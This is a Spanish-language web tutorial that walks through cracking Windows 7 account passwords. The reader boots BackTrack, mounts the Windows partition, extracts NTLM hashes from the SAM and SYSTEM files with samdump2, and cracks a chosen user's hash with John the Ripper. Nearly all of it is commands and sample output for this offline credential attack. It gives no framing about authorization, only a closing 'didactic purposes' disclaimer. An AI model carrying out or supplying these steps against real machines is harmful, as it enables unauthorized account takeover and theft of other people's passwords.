Home > Hacking > Hack de contraseña de Windows 7 con Backtrack 4-R2 ó BT5-R3

En Windows NT/2000/XP/2003/VISTA/7 las contraseñas se almacenan en el archivo SAM(Security Account Manager). Este es el fichero que contiene los nombres de usuario y las contraseñas de todos los usuarios del sistema local, o incluso del dominio, si se trata de un controlador de dominio.

El archivo SAM y SYSTEM se encuentra en la ruta \Windows\System32\config

Abrimos una Terminal o consola

PASO 1 : Ahora listaremos las tablas de particiones con el siguiente comando:

root@bt: ~# fdisk -l

Observaremos algo asi

Device         Boot     Start      End Blocks     id         System
/dev/sda1      13      7784       62417920      7       HPFS/NTFS
* /dev/sda2      26     23456     156623556     23      HPFS/NTFS
/dev/sda3      24     35217      44387444     45       LINUX

PASO 2 : Comando utilizado para crear un punto de montaje es:

root@bt: ~# mkdir /mnt/windows7

PASO 3 : Montaje de su partición NTFS con el comando:

root@bt: ~# mount -t ntfs /dev/sda2 /mnt/windows7

PASO 4 : Accedemos al directorio que creamos y montamos la partición de windows.

root@bt: ~# cd /mnt/windows7

Con el comando ls muestra el contenido de un directorio.

root@bt: /mnt/windows7# ls

Observamos que esta partición sea la correcta donde esta instalado windows

Observe dos directorios User (ocupe el comando cd /Users y despues ls para ver todos los usuarios), Windows siga con el siguiente paso.

En caso de no observar estos directorios regrese al PASO 3 indicando la particion donde esta instalado windows

PASO 5 : Ahora accedemos al directorio donde se encuentra el SAM SYSTEM de Windows que es donde se almacenan los Hashes de contraseñas de los usuarios, ubicada en /Windows/System32/config:

root@bt: /mnt/windows7# cd /Windows/System32/config

PASO 6 : Utilice la herramienta “Samdump” para mover los hashes del archivo SAM en el archivo “pass1″.

root@bt: /mnt/windows7/Windows/System32/config# samdump2 system sam > /root/pass1

PASO 7 : A través del “grep” búsqueda de comandos del Administrador de hash en el archivo y guardarlo en otro archivo “PASS2″.

root@bt: /mnt/windows7/Windows/System32/config# cat /root/pass1 | grep NOMBRE_USUARIO > /root/pass2

NOMBRE_USUARIO = Es el usuario del que queremos obtener su contraseña recuerde PASO 4

PASO 8 : Use John The Ripper (jtr) en BT4 y (john) en BT5 para encontrar las contraseñas.

root@bt: /mnt/windows7/Windows/System32/config# cd /pentest/passwords/jtr

PASO 9 : Escriba ./John para ver el formato y las distintas opciones.

root@bt: /pentest/passwords/jtr# ./John

PASO 10 : usar el hash NTLM así que usamos el siguiente comando para descifrarlo.

root@bt: /pentest/passwords/jtr# ./john –format=NT /root/pass2
ó
root@bt: /pentest/passwords/jtr# ./john –format:NT /root/pass2

loades 1 password hash (NT MD5 [128/128 SSE2 + 32/32])
contraseña                            NOMBRE_USUARIO

Esta información está diseñada con fines didácticos y no nos hacemos responsables del mal uso que se le pueda dar.